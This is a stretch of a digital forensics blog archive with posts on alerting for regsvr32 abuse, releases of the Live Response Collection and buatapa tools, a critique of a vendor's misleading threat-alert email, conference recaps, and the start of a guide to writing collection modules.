<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBlt5H_7mrlwpZcmZ8895u6xelbCdDPJJxzmS7xHrCE-lla-unM3ROlV25xaLZ74mBziQCyJAMTq2r_e9rEsMKGxt7zE5sn_-ecQFGeyuBPpX56P-X4G31reMYZzX0VpAAk4eWvY9qxODU/s1600/smtp.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBlt5H_7mrlwpZcmZ8895u6xelbCdDPJJxzmS7xHrCE-lla-unM3ROlV25xaLZ74mBziQCyJAMTq2r_e9rEsMKGxt7zE5sn_-ecQFGeyuBPpX56P-X4G31reMYZzX0VpAAk4eWvY9qxODU/s320/smtp.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>"SMTP" options under E-mail Settings</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtCtZ8H_iMfKURLLeRfLS_gAlyVkpVPcpG1433C18k4iS9DFyvB96FTr5n-yLeZUgQ8XhJOYhufVaPnS25ZEbO5JSSFdvZyM5mXfgMyIxPvxvc4Bo1V4uQsBbnp9dKwHFtgjPeyidbMCfg/s1600/emailnotif.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtCtZ8H_iMfKURLLeRfLS_gAlyVkpVPcpG1433C18k4iS9DFyvB96FTr5n-yLeZUgQ8XhJOYhufVaPnS25ZEbO5JSSFdvZyM5mXfgMyIxPvxvc4Bo1V4uQsBbnp9dKwHFtgjPeyidbMCfg/s640/emailnotif.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">My emailed alert on regsvr32, complete with screenshot!</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkP-GMFDkyt_Iv3RKr2eyLXPZdchhbjbqi6kN-QJT2bA9kWwDjzIn8JWDyiJzjo8SjR9WyBRN-3v0GJCJe9QxSEACRJdFdpuxz8C5fZpfbPnb8UqFlOD09ERoHFcIqCF66-mNL7KowOXXn/s1600/sshot.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkP-GMFDkyt_Iv3RKr2eyLXPZdchhbjbqi6kN-QJT2bA9kWwDjzIn8JWDyiJzjo8SjR9WyBRN-3v0GJCJe9QxSEACRJdFdpuxz8C5fZpfbPnb8UqFlOD09ERoHFcIqCF66-mNL7KowOXXn/s640/sshot.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Command prompt running regsvr32 captured in the screenshot!</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">It is important to note that if this was used maliciously, having the alert on regsvr32 means it will take the screenshot when the process starts. So you may not see your shell (or whatever else was done) but you should see the site/file that it references. And even if it downloads malware that cleans up after itself and squiblydoo, the email should have been sent before that actually happens, so (fingers crossed) you will hopefully get a notification. And if you do get a notification, this would probably be a really good time to at least start gathering data from the system, most likely at least memory and volatile data (hmm...sounds like a good job for the <a href="https://www.brimorlabs.com/tools/" target="_blank">Live Response Collection</a>!)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Unfortunately this only works for finding regsvr32 and does not have the capability to look for urls in the command itself, but it should be a pretty useful quick check to see if it gets called. And if your environment actually does use regsvr32 on a regular basis, this will get very noisy and a different solution will have to be found. It is also very important to remember that there still has to be a considerable amount of testing to try to remedy this situation, so this (or any other method) should only be a temporary fix until a long-term, viable, solution is presented, which is what we are all working toward!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-88979205749058694982016-01-12T11:18:00.002-05:002019-10-17T11:16:24.500-04:00Live Response Collection - Allosaurus<br />
<span style="font-size: large;">Hello readers and welcome back! Today we are proud to announce the newest round of updates to the Live Response Collection, specifically with a focus on some new features on the OSX side! </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"><b><u>Improved OSX features!</u></b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The biggest change is that the OSX version of the Live Response Collection now creates a memory dump using <a href="https://github.com/google/rekall/releases/" target="_blank">osxpmem</a>, as long as you run the program with root privileges. The script does the internal math, just like on the Windows side, to make sure that you have enough free space on your destination, regardless of whether or not it is an internal or external drive. I have encountered where OSX provides differently formatted results for the sizes (sometimes throwing in things like an equal sign or a random letter) and I tried to account for that as much as possible. If you encounter a bug with the memory dump please let me know and I will try to figure it out, but as I have done more and more work on the OSX side I have come to realize just how terrible OSX is. For example, some Apple programs do not work properly if it was created on Yosemite and it was running on El Capitan...so much for "it just works"! If you encounter any issues I will try to get to the bottom of it as best as I can though!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The other main OSX feature is a topic that was briefly touched on during the <a href="https://www.youtube.com/watch?v=o7uSp8XVGLQ" target="_blank">Forensic Lunch on Friday</a>. Dave, Nicole, and James talked about the <a href="https://github.com/dlcowen/FSEventsParser" target="_blank">FSEvents Parser</a> that they wrote. If you run the script with root privileges the script will copy the fseventsd data to the correlating destination folder, and then you can run their tool to go through the data. (NOTE: It is best to transfer the data to a Windows machine to do this, otherwise the fseventsd data may be hidden from you, depending on how the access permissions on your machine are set)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b><u>A new naming scheme!</u></b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">As you may have noticed, the title is "Live Response Collection - <a href="http://www.nhm.ac.uk/discover/dino-directory/allosaurus.html" target="_blank">Allosaurus</a>". I decided to go with the names of dinosaurs to differentiate between Live Response Collection versions, which will also ensure that you are using the latest build and also to help with any bugs that may pop up. Sometimes a bug that is reported has been fixed in a newer release, but because of the old naming scheme, it wasn't immediately clear if you were actually using the latest build. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">As always, please do not hesitate to contact me if you have any questions or comments regarding the Live Response Collection </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span><br />
<a href="https://www.brimorlabs.com/Tools/LiveResponseCollection-Cedarpelta.zip" style="font-size: x-large;" target="_blank">LiveResponseCollection-Cedarpelta.zip - download here</a><span style="font-size: large;"> </span><br />
<br style="font-size: x-large;" />
<span style="font-size: large;">MD5: 7bc32091c1e7d773162fbdc9455f6432</span><br />
<span style="font-size: large;">SHA256: 2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63</span><br />
<span style="font-size: large;">Updated: September 5, 2019</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com5tag:blogger.com,1999:blog-1547389155659419533.post-84600412560518832022016-01-07T13:22:00.005-05:002016-01-10T14:27:00.019-05:00Cyber Security Snake Oil<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Hello again readers and welcome back! Today's blog post is going to cover an instance, which unfortunately occurs WAY to often in the cyber-security realm, especially on the topic of "threat intelligence" or "advanced analytics" or whatever other buzzwords the marketing folks are spinning since it is now 2016. I had originally planned to write this post toward the end of the month, but the more I thought about the whole incident the angrier I got, so I am posting it much earlier than I had anticipated.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The subject of today's post involves a very large company. I have redacted their name and information at the request of the company involved and will be referring to them as "Kelvarnsen Industries" and an external company that I will call "Mountebank Labs". (<b>FULL DISCLOSURE:</b> I have not had any dealings, personally, with any member of Mountebank Labs but I have since spoken with several individuals who have). Apparently a few days ago, the CEO of </span><span style="font-size: large;">Mountebank</span><span style="font-size: large;"> Labs sent an email to the CIO of Kelvarnsen Industries informing them of "an early warning about an email they have received (or are about to receive) that contained malware <i>[sic]</i>". A friend of mine works at Kelvarnsen Industries and asked my opinion about the email, which was flagged internally by the CIO as a phishing attempt because his first name was wrong (not just spelled wrong, his name was actually wrong), the message contained a slew of grammatical errors and sentences that made no sense, and referenced something that really did not seem possible. Honestly the most disturbing piece of the email sent from </span><span style="font-size: large;">Mountebank</span><span style="font-size: large;"> Labs is that it appears they are actually targeting Kelvarnsen Industries in their "threat intelligence" platform:</span><br />
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRQzBFTEy8xx4Luzt5a0CC87l0PTEdw1P5-0ls4YbBjNbAmGQGJW9FC320NCe44mbwJB9xt5-FykVAM8KbSKrOhZv4Swzw0CUlHH9yZlZ-cs52suWDKBQxZb1LcnQvBoMtkFTJKRdZNaO0/s1600/fakealert.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRQzBFTEy8xx4Luzt5a0CC87l0PTEdw1P5-0ls4YbBjNbAmGQGJW9FC320NCe44mbwJB9xt5-FykVAM8KbSKrOhZv4Swzw0CUlHH9yZlZ-cs52suWDKBQxZb1LcnQvBoMtkFTJKRdZNaO0/s640/fakealert.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">"Alert" information sent from Mountebank Labs CEO to Kelvarnsen Industries CIO</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I took a look at the referenced data and was able to easily determine it was email that was sent ENTIRELY internally, as the policy for Kelvarnsen Industries is to upload suspected malicious emails with attachments directly to VirusTotal. Yes, you read that 100% correctly. The email appeared to come FROM a legitimate internal user, sent TO a legitimate internal user...because....wait for it....THAT IS EXACTLY WHAT HAPPENED!!!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">To take a quote from their blog post, in which they wrote about this as a "win" (with my own comments added in <b>BOLD):</b></span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgctkYiqsr5yaE2B82_gBtEf80j7PZTx5iFN-9g3NfpW5-mzTfaHk1FVJCyQZD4G9cK7Z5GJQGw0n0lvCmV-CaKsSiTDMjA0c2lE7Ul5lDHHrE9OEA_-WnjOFixLLzhtKKU8CRPfX67Jw2S/s1600/blogquote.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgctkYiqsr5yaE2B82_gBtEf80j7PZTx5iFN-9g3NfpW5-mzTfaHk1FVJCyQZD4G9cK7Z5GJQGw0n0lvCmV-CaKsSiTDMjA0c2lE7Ul5lDHHrE9OEA_-WnjOFixLLzhtKKU8CRPfX67Jw2S/s640/blogquote.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Excerpt from blog post, with my own comments added</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now, we can argue the merits of uploading samples to VirusTotal or doing analysis on them internally first. In this case, I personally happen to support the former, because there is no need for the internal CIRT to respond to an email that contained an attachment which solely installs a toolbar for "Decent Looking Mail Order Brides", so depending on what the VirusTotal results determines the internal escalation of the email. If an actual advanced threat group is trying to infiltrate an organization and they have a piece of malware uploaded to VirusTotal and the whole world can see it, so what? It means that they have been discovered and will probably have to come up with something new in an effort to achieve their goal of infiltrating their target. VirusTotal is simply a tool that we can use, it is not the end all be all solution (see <a href="https://en.wikipedia.org/wiki/Polymorphic_code" target="_blank">malware, polymorphic</a>)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">There are a limited number of individuals and companies that work in our profession, but that number is growing every single day. Unfortunately this growth also brings with it individuals who misrepresent capabilities and understanding of pertinent information, but are more than happy to sell you products and services that usually come with very expensive price tags. In this particular case, it looks like </span><span style="font-size: large;">Mountebank</span><span style="font-size: large;"> Labs is loading domains into VirusTotal and, when a hit comes back, shooting off an email to the CISO or CIO of the company and "alerting" them. While there is nothing "wrong" with that aspect of it (although frankly, I don't know how you can have the time or resources to do that, as everyone that I know has plenty of work with our own clients and don't need to put out a blanket domain search in VirusTotal in an effort to drum up work), in my opinion it is not the right thing to do. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I do perform monitoring from several data sources for my clients, and in the event of discovering data from another company, I will inform them who I am, who I work for, of exactly what I was doing, how I found their data, where they can go to find that data, how to contact me, and leave it at that. I strive to be as 100% transparent as possible because the last thing that I want to have happen is a company to think that I was the source of their data being compromised. If they want to have additional conversations that is entirely up to them and I tell them so. I want to help people protect their networks and sensitive data, regardless of whether or not they hire me to help them. If you receive an email like this, the author of the email (who will usually NOT be a CEO or a member of the sales team, it will likely be a technical employee or a manager) should answer several questions in the original message without your or your CIRT team searching for answers to these questions:</span><br />
<span style="font-size: large;"><br /></span>
<br />
<ul>
<li><span style="font-size: large;">Who exactly are you?</span></li>
</ul>
<ul>
<li><span style="font-size: large;">What company do you currently work for?</span></li>
</ul>
<ul>
<li><span style="font-size: large;">What were you doing when you found this information?</span></li>
</ul>
<ul>
<li><span style="font-size: large;">Where did you find this information?</span></li>
</ul>
<ul>
<li><span style="font-size: large;">When did you find this information?</span></li>
</ul>
<ul>
<li><span style="font-size: large;">What is your contact information (not in a signature block, you should clearly list your contact information)</span></li>
</ul>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">If these questions are not answered with very specific details, it is more than likely going to be just another marketing email, trying to get you to spend your money to utilize their services. Granted, this may not always be the case, but usually, it will be. When in doubt, you can always get a second opinion, which is exactly what Kelvarnsen Industries did when they contacted me regarding this issue.</span><br />
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">This case also highlights another area of importance that I cannot stress enough. It is bad enough that CIRT/Net Defenders/etc. teams are tasked on a daily basis with detecting and thwarting attacks by adversaries. When a company's C-Suite executives receive an email like this, the teams must stop everything that they are doing in order to manage their C-Suite executive's concern and ultimately determine if an email such as this is an actual phish or is nothing more than vaguely worded and misconstrued marketing attempt (ahem...scare tactics). <u><b>This also shows that unknowledgeable individuals are targeting companies, in publicly available data sources, in an effort to find out more about them in an attempt to secure a business deal. Pretty ironic that these folks are doing the EXACT same thing that adversary groups are doing: attempting to gather information for their own financial or informational gain. The irony of that is not lost on anyone! The unfortunate truth about marketing emails like this is that, just like phishing, they must work occasionally or else these </b></u></span><span style="font-size: large;"><u><b>unknowledgeable</b></u></span><span style="font-size: large;"><u><b> individuals would not send them.</b></u> These teams also have enough to do on a daily basis (plus after-hours and weekends, as was the case here) without having to deal with the Marketing Persistent Threat. Blatant marketing attempts such as the one detailed in this post hurt <u>MUCH</u> more than they could ever possibly help!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com2tag:blogger.com,1999:blog-1547389155659419533.post-32197309307073510542015-11-12T11:29:00.004-05:002018-01-30T11:06:07.300-05:00Updates (and a new feature!) to buatapa <br />
<span style="font-size: large;">Hello again readers and welcome back! Today we are pleased to announce the release of a new version of <a href="http://www.brimorlabsblog.com/2015/08/publicly-announcing-buatapa.html">buatapa</a>, updating from version 0.0.5 to 0.0.6. The changes are going to be mostly transparent for end users, but it does account for a change in the output of autoruns.csv files generated with the recently release <a href="https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx">Autoruns 13.5</a>, which has an additional field in the output. The new version of buatapa attempts to identify if the autoruns.csv file was generated by Autoruns 13.5, or if it was generated by Autoruns 13.4 (or earlier). The parsing of the data and need for the VirusTotal API key to do the VirusTotal lookups is exactly the same.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">And as a super awesome bonus feature, it also performs queries of <a href="http://threatcrowd.org/">ThreatCrowd</a> and returns data if it is found. In order to not have to write an additional timer (the ThreatCrowd API is limited to one query every 10 seconds) I included the ThreatCrowd lookup with the VirusTotal lookup, so for the purposes of buatapa you are required to have the VirusTotal API in order to perform the ThreatCrowd look ups. You can modify the script to not require that if you wish, but if you do that be sure to allot for a 10 second sleep between each query. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4DWj-tR3QCK-bIb4fUQGaeZGW9gLTw7kadwIhwaXzYazRtaihMFj2vXqEOW_MF1KkO_yZBBLGLv-Bdq29D_knmfUprV0gWXphW0pMu0IJ6zaBWOl_NZz6ouAbTbGREPIU6IzKn42O0TuW/s1600/new-buatapa.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4DWj-tR3QCK-bIb4fUQGaeZGW9gLTw7kadwIhwaXzYazRtaihMFj2vXqEOW_MF1KkO_yZBBLGLv-Bdq29D_knmfUprV0gWXphW0pMu0IJ6zaBWOl_NZz6ouAbTbGREPIU6IzKn42O0TuW/s640/new-buatapa.jpg" width="608" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Output results of buatapa 0.0.6</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">In this particular instance, we have two URLs, one is for the <a href="https://www.virustotal.com/en/file/9dcbb64f365fdf6f80607d297d88134efa4a74ebadc3cc3c5effa9c4f8625937/analysis/1439870354/">Virus Total results</a> of the hash:</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4NXcxbCY6rmcB5GblypWt9TjmIFwuljR7wDTR0xeTNKJsu4aHimn5l0nyv5-Rj0BU1AbTnNK5-_oG2LHThvkX5Yzb1QsHRBBI0HE-a5mb83gEdjg6ago8jnBV5m2cMrq7WqNYqoRpYKD9/s1600/vt-results.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="528" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4NXcxbCY6rmcB5GblypWt9TjmIFwuljR7wDTR0xeTNKJsu4aHimn5l0nyv5-Rj0BU1AbTnNK5-_oG2LHThvkX5Yzb1QsHRBBI0HE-a5mb83gEdjg6ago8jnBV5m2cMrq7WqNYqoRpYKD9/s640/vt-results.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">VirusTotal results for the ZeroAccess malware sample</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">and the other is for the </span><a href="https://www.threatcrowd.org/malware.php?md5=8df1f6f7cf864df50f02cbab508564b0" style="font-size: x-large;">Threat Crowd results</a><span style="font-size: large;"> of the hash:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMrS06Dda76NFkkv8-N000eR8Ra1OppcBS2iyBpLENFABZfdk09otNsm3lrVfciWW6V_9o-c1sSQkAlHFkJB-W-RaRNI8z9APzx1x4yNKQicHycXkekG-PzVQry9Qmyrjwy83JjId3ciSQ/s1600/tc-results.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMrS06Dda76NFkkv8-N000eR8Ra1OppcBS2iyBpLENFABZfdk09otNsm3lrVfciWW6V_9o-c1sSQkAlHFkJB-W-RaRNI8z9APzx1x4yNKQicHycXkekG-PzVQry9Qmyrjwy83JjId3ciSQ/s640/tc-results.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">ThreatCrowd results for the ZeroAccess malware sample</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">If it has been noted on ThreatCrowd you can go through the information listed to look for additional information on the malware, including domains and IP addresses, in an effort to help combat/detect other instances of the malware within your environment. Plus, the pictures are really nice!!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;">buatapa_0_0_7.zip - <a href="https://www.brimorlabs.com/Tools/Scripts/Python/buatapa_0_0_7.zip" target="_blank">download here</a> </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">MD5: 8c2f9dc33094b3c5635bd0d61dbeb979</span><br />
<span style="font-size: large;">SHA-256: c1f67387484d7187a8c40171d0c819d4c520cb8c4f7173fc1bba304400846162</span><br />
<span style="font-size: large;">Version 0.0.7</span><br />
<span style="font-size: large;">Updated: January 30, 2018</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-39037771955641666572015-10-30T13:23:00.000-04:002015-10-30T14:22:48.501-04:00Putting a wrap on October<br />
<span style="font-size: large;">Hello again readers and welcome back! For us, October consisted of a lot of traveling giving presentations about the Live Response Collection at <a href="http://www.bsidesraleigh.ninja/" target="_blank">BSides Raleigh</a>, <a href="http://www.aacc.edu/cybercenter/" target="_blank">Anne Arundel Community College</a>, <a href="http://womenetc.org/">WomenEtc.</a><span id="goog_325243741"></span><span id="goog_325243742"></span><a href="https://www.blogger.com/"></a> (Richmond, Virginia), and the <a href="http://www.osdfcon.org/" target="_blank">Open Source Digital Forensics Conference (OSDFCON)</a>. I just posted the presentation that I gave at <a href="http://www.slideshare.net/BriMorLabs/brimor-labs-live-response-collection-osdfcon" target="_blank">OSDFCon on slideshare</a>, if you would like to view the slides!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">NOTE: I made some slight variations on the presentation at each venue, so if you attended one (or more!) of my talks you will notice that the slides are similar, but may not be exactly what you saw. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">All of the events that I spoke at were great, but I was most impressed with OSDFCon this year. There was an incredible lineup of speakers at the event and the venue and presentation was fantastic (And thanks again goes out to Ali for all of her hard work, mainly behind the scenes, to ensure the event went smoothly!). There were quite a few students and other new entrants into the DFIR community</span><span style="font-size: large;"> at this years event, which is always great to see. Hopefully that trend continues, as there is not a single person within the DFIR community who has gotten to where they are today without the help, collaboration, and communication of others!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Not to give away any spoilers, but I am working on some exciting updates for the Live Response Collection, primarily on the OSX side, that I hope to have out before the end of the year. I am always looking for anyone who can devote any time or resources for beta testing, so if you want to help please do not hesitate to reach out!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-54394302600394307432015-09-21T09:31:00.004-04:002019-10-17T11:16:34.415-04:00Introducing Windows Live Response Collection modules...and how to write your own!<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Hello again readers and welcome back. Today I am very happy to announce the public release of the latest round of updates to the Live Response Collection. This release focuses on the "modules" that I <a href="http://www.brimorlabsblog.com/2015/08/at-long-last-updates-to-live-response.html" target="_blank">touched briefly on in the last update</a>. The size of the six main scripts themselves has been greatly reduced and almost all of the code now resides in the folder "Scripts\Windows-Modules". This makes maintaining the code easier (since all six scripts share a large majority of the code, it only has to be edited once instead of six times) and allows even greater customization opportunities for end users. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">There are some small changes to the way the LRC handles data, including a built in check to ensure the date stamp does not have weird characters, which was seen on some UK based systems. The script now attempts to decipher that data properly but, in the event that it cannot, it tries to ensure that backslashes are removed from the date field so that way the output of the tools and system calls are stored properly. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<div style="text-align: center;">
<span style="font-size: large;"><b><u>Writing your own module!!</u></b></span></div>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The main focus of this update is demonstrating how easy it is to create your own module. I attempted to make this process as easy as possible, so if you want to write/add modules, you can do so very easily. Since it is written in batch, you can write your own module however you would like, but following this methodology should present the best results and ensure that the script will error out rather than possibly present bad data to you.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The first thing you have to do is choose an executable (or system call) that you would like to add. In this particular case, I decided that the "<a href="http://www.nirsoft.net/utils/wireless_network_view.html">Wireless NetView" executable from nirsoft</a> would be a good choice for the walk through. The first thing you have to do is to <a href="http://www.nirsoft.net/utils/wirelessnetview.zip">download the zip file</a> from their website. Once that is done, navigate to the folder and unzip the file. Once that is done, you should see a folder like this. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6D3k5jll9bHxVixror6171FNBwgbWoBZR2oEa4gFCjrd-YMpmpCeYIUNPdCEAXDz524Z634RniE6yBCFbHdMhSB8KOb5QF8xfbdYNLh4gNz5_jN9Qo7SRJ-FdWWVun3GZQWPMJJGbVTsv/s1600/wirelessnetview.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6D3k5jll9bHxVixror6171FNBwgbWoBZR2oEa4gFCjrd-YMpmpCeYIUNPdCEAXDz524Z634RniE6yBCFbHdMhSB8KOb5QF8xfbdYNLh4gNz5_jN9Qo7SRJ-FdWWVun3GZQWPMJJGbVTsv/s640/wirelessnetview.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Contents of the folder "wirelessnetview"</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Copy that folder to the "Tools" directory under the Windows Live Response folder. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0G5ZIcBM9zNi4JU-RCR10IhWDUqFywUcIrBB0p6AHztfI1SY_aWfTVZ4Gg7wUdy5nDQ4OMkIWzQWM_x3aUQ8aUUId46cuS8mvrjqPT6rFrPy7gdkaveew_MrvD7qZ7pZrC0KQ3yNla3JM/s1600/wnv_in_tools.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0G5ZIcBM9zNi4JU-RCR10IhWDUqFywUcIrBB0p6AHztfI1SY_aWfTVZ4Gg7wUdy5nDQ4OMkIWzQWM_x3aUQ8aUUId46cuS8mvrjqPT6rFrPy7gdkaveew_MrvD7qZ7pZrC0KQ3yNla3JM/s640/wnv_in_tools.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>wirelessnetview folder under "Tools"</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Once that is done, you are ready to begin writing your module!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<div style="text-align: center;">
<span style="font-size: large;"><b><u>Initial Steps of Module Creation</u></b></span></div>
<div style="text-align: center;">
<span style="font-size: large;"><br /></span></div>
<span style="font-size: large;">This version of the Live Response Collection contains a file in the "Windows-Modules" folder called "Windows-Module-Template.bat". Open that file in your favorite text editing program.</span><br />
